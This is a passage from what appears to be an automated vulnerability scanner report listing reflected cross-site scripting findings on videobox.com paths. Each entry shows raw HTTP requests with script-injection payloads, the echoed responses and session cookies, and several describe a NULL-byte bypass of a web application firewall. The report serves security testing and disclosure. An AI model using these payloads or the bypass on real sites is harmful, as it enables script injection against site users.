<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/betad11eb<script>alert(1)</script>19af44959cb/privacy.seam</code>
...[SNIP]...

4.585. http://www.videobox.com/beta/privacy.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/privacy.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00a9976<script>alert(1)</script>e2367c56fab was submitted in the REST URL parameter 2. This input was echoed as a9976<script>alert(1)</script>e2367c56fab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/privacy.seam%00a9976<script>alert(1)</script>e2367c56fab HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 368

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/privacy.seam%00a9976<script>alert(1)</script>e2367c56fab</code>
...[SNIP]...

4.586. http://www.videobox.com/beta/reviews.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/reviews.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8955f<script>alert(1)</script>4803095c62e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta8955f<script>alert(1)</script>4803095c62e/reviews.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 365

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta8955f<script>alert(1)</script>4803095c62e/reviews.seam</code>
...[SNIP]...

4.587. http://www.videobox.com/beta/reviews.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/reviews.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %004779a<script>alert(1)</script>07bdb1ea8c0 was submitted in the REST URL parameter 2. This input was echoed as 4779a<script>alert(1)</script>07bdb1ea8c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/reviews.seam%004779a<script>alert(1)</script>07bdb1ea8c0 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 368

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/reviews.seam%004779a<script>alert(1)</script>07bdb1ea8c0</code>
...[SNIP]...

4.588. http://www.videobox.com/beta/set_channel.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/set_channel.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87fa3<script>alert(1)</script>dd354c5b78e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta87fa3<script>alert(1)</script>dd354c5b78e/set_channel.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta87fa3<script>alert(1)</script>dd354c5b78e/set_channel.seam</code>
...[SNIP]...

4.589. http://www.videobox.com/beta/set_channel.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/set_channel.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00ca520<script>alert(1)</script>6a0d0982f0c was submitted in the REST URL parameter 2. This input was echoed as ca520<script>alert(1)</script>6a0d0982f0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/set_channel.seam%00ca520<script>alert(1)</script>6a0d0982f0c HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 372

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/set_channel.seam%00ca520<script>alert(1)</script>6a0d0982f0c</code>
...[SNIP]...

4.590. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/style/shun/base/base/en/screen.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d866<script>alert(1)</script>c0b34aeb4e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta9d866<script>alert(1)</script>c0b34aeb4e1/style/shun/base/base/en/screen.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 388

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta9d866<script>alert(1)</script>c0b34aeb4e1/style/shun/base/base/en/screen.seam</code>
...[SNIP]...

4.591. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/style/shun/base/base/en/screen.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b08d0<script>alert(1)</script>efcb3af715a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/styleb08d0<script>alert(1)</script>efcb3af715a/shun/base/base/en/screen.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 388

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/styleb08d0<script>alert(1)</script>efcb3af715a/shun/base/base/en/screen.seam</code>
...[SNIP]...

4.592. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/style/shun/base/base/en/screen.seam

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 396f4<script>alert(1)</script>9774f447aef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/style/shun396f4<script>alert(1)</script>9774f447aef/base/base/en/screen.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 388

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/style/shun396f4<script>alert(1)</script>9774f447aef/base/base/en/screen.seam</code>
...[SNIP]...

4.593. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/style/shun/base/base/en/screen.seam

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f691f<script>alert(1)</script>1a9c9b9c8d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/style/shun/basef691f<script>alert(1)</script>1a9c9b9c8d7/base/en/screen.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 388

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/style/shun/basef691f<script>alert(1)</script>1a9c9b9c8d7/base/en/screen.seam</code>
...[SNIP]...

4.594. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/style/shun/base/base/en/screen.seam

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a4609<script>alert(1)</script>45a1f305d5b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/style/shun/base/basea4609<script>alert(1)</script>45a1f305d5b/en/screen.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 388

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/style/shun/base/basea4609<script>alert(1)</script>45a1f305d5b/en/screen.seam</code>
...[SNIP]...

4.595. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/style/shun/base/base/en/screen.seam

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ea984<script>alert(1)</script>c73fd3d8ee7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/style/shun/base/base/enea984<script>alert(1)</script>c73fd3d8ee7/screen.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 388

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/style/shun/base/base/enea984<script>alert(1)</script>c73fd3d8ee7/screen.seam</code>
...[SNIP]...

4.596. http://www.videobox.com/beta/support/home.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/support/home.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2103d<script>alert(1)</script>284aa8a44d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta2103d<script>alert(1)</script>284aa8a44d7/support/home.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 370

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta2103d<script>alert(1)</script>284aa8a44d7/support/home.seam</code>
...[SNIP]...

4.597. http://www.videobox.com/beta/support/home.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/support/home.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 322d5<script>alert(1)</script>3a8d2ee99e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/support322d5<script>alert(1)</script>3a8d2ee99e8/home.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
